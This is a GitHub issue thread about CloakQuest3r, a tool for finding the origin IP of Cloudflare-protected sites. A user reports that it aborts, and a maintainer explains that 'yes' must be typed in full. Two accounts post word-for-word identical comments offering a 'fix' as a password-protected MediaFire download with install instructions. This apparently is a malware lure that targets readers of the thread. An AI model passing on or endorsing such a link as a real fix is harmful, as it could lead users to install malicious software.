### ISSUE TITLE
It hurts. It hurts so much.

### ISSUE THREAD

**Issue by 7huukdlnkjkjba** [spyboy-productions/CloakQuest3r#12]
___ _             _      ____                 _   _____
  / __\ | ___   __ _| | __ /___ \_   _  ___  ___| |_|___ / _ __
 / /  | |/ _ \ / _` | |/ ///  / / | | |/ _ \/ __| __| |_ \| '__|
/ /___| | (_) | (_| |   </ \_/ /| |_| |  __/\__ \ |_ ___) | |
\____/|_|\___/ \__,_|_|\_\___,_\ \__,_|\___||___/\__|____/|_|
Uncover the true IP address of websites safeguarded by Cloudflare & ohers.

[+] Version      : 1.0.5
[+] Created By   : Spyboy
 └➤ Twitter      : https://spyboy.in/twitter
 └➤ Discord      : https://spyboy.in/Discord
 └➤ Website      : https://spyboy.in/
 └➤ Blog         : https://spyboy.blog/
 └➤ Github       : https://github.com/spyboy-productions/CloakQuest3r

[!] Checking if the website uses Cloudflare

- Website is not using Cloudflare.

[+] Website is using:  Tengine

> Do you want to proceed? (yes/no): y
Operation aborted. Exiting...

**Comment by thisisshubhamkumar** [comment]
What hurts lol? Banner? social links? Or are you just too lazy to type "yes"?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by 7huukdlnkjkjba** [comment]
> 有什么不好意思？横幅？社交链接？还是你只是懒得输入“是”？

No, the website uses: Tengine, which cannot be scanned

**Comment by thisisshubhamkumar** [comment]
> > 有什么不好意思？横幅？社交链接？还是你只是懒得输入“是”？
> 
> No, the website uses: Tengine, which cannot be scanned

You can scan even if the website is not using cloudflare, you have type "yes" not "y" when it asks if you wanna proceed.
